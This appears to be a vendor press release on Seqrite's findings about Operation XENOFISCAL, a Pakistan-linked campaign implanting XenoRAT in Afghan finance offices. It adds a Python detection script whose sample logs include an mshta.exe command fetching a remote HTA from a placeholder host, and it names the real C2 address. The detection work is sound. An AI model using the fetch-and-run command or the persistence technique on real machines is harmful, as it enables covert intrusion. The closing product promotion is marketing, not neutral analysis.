A new chapter in South Asia’s cyber espionage story is unfolding far from the front page, inside finance ministries and provincial revenue offices. Seqrite, the enterprise security arm of Quick Heal Technologies Limited, a global provider of cybersecurity solutions, has disclosed details of Operation XENOFISCAL – a targeted cyber espionage campaign attributed with medium-to-high confidence to SideCopy, a Pakistan-linked advanced persistent threat (APT) group operating under the broader Transparent Tribe/APT36 umbrella.
Researchers at Seqrite Labs, India’s largest malware analysis facility, discovered that the operation implants a persistent variant of XenoRAT 1.8.7 across Afghanistan’s Ministry of Finance (MoF) and provincial revenue directorates, using carefully crafted Pashto-language spear-phishing lures and a multi-stage, largely fileless infection chain that abuses legitimate Windows binaries to bypass traditional defenses.
The campaign begins with a spear-phishing email carrying a ZIP archive that appears, at first glance, to be a routine internal document. Inside sits a malicious Windows shortcut (LNK) file whose Pashto filename translates to “List of Employees Who Were Introduced to the Intellectual and Psychological Warfare Seminar,” a theme carefully chosen to match Afghanistan’s government context and staff workflows. Once a targeted official executes the shortcut, the LNK abuses the legitimate Windows utility mshta.exe as a Living-off-the-Land Binary to silently fetch a remote HTML Application (HTA) from a compromised Afghan education domain, executing heavily obfuscated JavaScript directly in memory instead of writing obvious binaries to disk.
From there, the campaign escalates through multiple in-memory stages. A heavily obfuscated JScript payload reconstructs malicious components using hex-encoded arrays, custom Base64 routines, and .NET deserialization, ultimately loading a .NET DLL-based first-stage loader. While the victim is presented with a realistic decoy document – a detailed Afghan Ministry of Finance provincial staff directory listing finance directors, revenue chiefs, and mobile numbers for all 34 provinces – the loader stealthily creates a new directory under the Public user profile, establishes registry-based persistence under a typosquatted “Edgre” entry designed to mimic Microsoft Edge, and prepares the environment for the final payload.
In the last stage, the infection deploys XenoRAT 1.8.7, an open-source remote access trojan configured to communicate over TCP with attacker-controlled infrastructure hosted on European bulletproof servers, including the command-and-control IP 185.235.137.106. Once active, XenoRAT offers the operator a full post-exploitation toolkit, including remote command execution, dynamic DLL loading, file exfiltration, scheduled task creation, antivirus reconnaissance, SOCKS5 proxy tunneling, keystroke logging, screenshot capture, clipboard monitoring, webcam and microphone surveillance, and the ability to remove persistence traces or uninstall itself to erase evidence. By relying on staged, in-memory execution and trusted components such as mshta.exe, the operation leaves a minimal forensic footprint on disk while maintaining durable, high-value access to fiscal and personnel data inside Afghan government systems.
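Each of the three stages described above (mshta.exe fetching a remote HTA, the typosquatted "Edgre" persistence entry, and XenoRAT's TCP beacon to 185.235.137.106) leaves a distinct telemetry trace that a SOC can alert on. The Python below is an added detection example, not Seqrite's code, run over constructed Sysmon-style log lines; the key=value log format, the Run-key location of the "Edgre" entry, the Public-profile path and the education-domain URL are assumptions or placeholders, and the typosquat check is generalized to any near-miss of "Edge" rather than only the one name the write-up reports.

```python
import re
from difflib import SequenceMatcher

# C2 IP is from the write-up. Run-key location, field names and the
# URL/path values in the sample lines are assumptions or placeholders.
KNOWN_C2 = {"185.235.137.106"}
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

def parse(line):
    """Turn a 'Key=value|Key=value' record into a dict (constructed format)."""
    return dict(part.split("=", 1) for part in line.strip().split("|"))

def looks_like_edge_typosquat(name):
    """Near-miss of 'Edge' such as 'Edgre', but not the exact legitimate name."""
    lower = name.lower()
    return lower != "edge" and SequenceMatcher(None, lower, "edge").ratio() >= 0.75

def classify(event):
    """Return the detection names that fire for one parsed event."""
    hits = []
    kind = event.get("EventType")
    if kind == "ProcessCreate":
        # Stage 1: mshta.exe used as a LOLBin to pull an HTA from a remote host.
        image = event.get("Image", "").lower()
        if image.endswith("mshta.exe") and REMOTE_URL.search(event.get("CommandLine", "")):
            hits.append("mshta_remote_hta")
    elif kind == "RegistryValueSet":
        # Stage 2: Run-key persistence under a value name that mimics Microsoft Edge.
        target = event.get("TargetObject", "")
        if RUN_KEY.search(target) and looks_like_edge_typosquat(target.rsplit("\\", 1)[-1]):
            hits.append("run_key_edge_typosquat")
    elif kind == "NetworkConnect" and event.get("DestinationIp") in KNOWN_C2:
        # Stage 3: XenoRAT beaconing to the published C2 address.
        hits.append("xenorat_c2_ip")
    return hits

def scan(lines):
    """Return (line, detections) for every log line that fires at least one rule."""
    scored = ((ln, classify(parse(ln))) for ln in lines)
    return [(ln, h) for ln, h in scored if h]

# Constructed sample telemetry; the last two lines are benign controls.
SAMPLE_LOGS = [
    r"EventType=ProcessCreate|Image=C:\Windows\System32\mshta.exe|CommandLine=mshta.exe https://edu-domain.example/seminar/list.hta",
    r"EventType=RegistryValueSet|TargetObject=HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Edgre",
    r"EventType=NetworkConnect|Image=C:\Users\Public\placeholder\xeno.exe|DestinationIp=185.235.137.106",
    r"EventType=ProcessCreate|Image=C:\Windows\System32\mshta.exe|CommandLine=mshta.exe C:\Setup\local.hta",
    r"EventType=RegistryValueSet|TargetObject=HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Edge",
]
```

Calling `scan(SAMPLE_LOGS)` flags only the first three lines, one rule each; a local HTA and the genuine "Edge" value name pass through untouched.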
Researchers at Seqrite Labs noted that Operation XENOFISCAL is part of a broader regional pattern in which SideCopy and related clusters adopt customized open-source RATs, weaponise local-language lures, and stage infrastructure on foreign soil to complicate attribution. The campaign’s use of a compromised Afghan educational domain as a delivery platform, combined with a genuine MoF staff directory as the decoy document, underlines how much prior reconnaissance and data harvesting went into tailoring the operation for maximum credibility and impact.
For governments and critical institutions across the region, the implications stretch beyond endpoint compromise. Ministries of finance, tax authorities, and provincial revenue offices manage deeply sensitive data: national budgets, revenue flows, payroll, contracts, and extensive records on individual officials and vendors. Compromise at this layer is not only an intelligence coup; it can become a gateway for corruption, coercion, and strategic economic disruption. In India, where similar fiscal, identity and benefits data is central to governance, the Digital Personal Data Protection (DPDP) Act, 2023 raises the stakes further by placing clear accountability on Data Fiduciaries when personal data is exposed or misused through such intrusions.
In this environment, advanced cybersecurity solutions such as Seqrite Data Privacy and Digital Risk Protection Services (DRPS) have become must-have capabilities for government departments and enterprises that want to move beyond perimeter-centric security and truly protect what attackers are after – the data itself. Seqrite also offers a Digital Risks Calculator, which enables organizations to assess their potential exposure across digital assets, identify areas of elevated risk, and prioritize mitigation efforts. Used alongside Seqrite’s endpoint, server, and gateway protections, these help close the gap that campaigns like Operation XENOFISCAL systematically exploit: poorly inventoried, overexposed, and weakly governed information assets.
All Seqrite products are aligned with the provisions of the DPDP Act, allowing government and enterprise customers to strengthen cyber defense and data protection in tandem rather than as separate initiatives. Seqrite’s portfolio – from Endpoint and Server Security to Threat Intelligence and Ransomware Recovery as a Service (RRaaS) – is designed to give defenders both internal visibility and external situational awareness in the face of increasingly targeted, politically motivated operations.
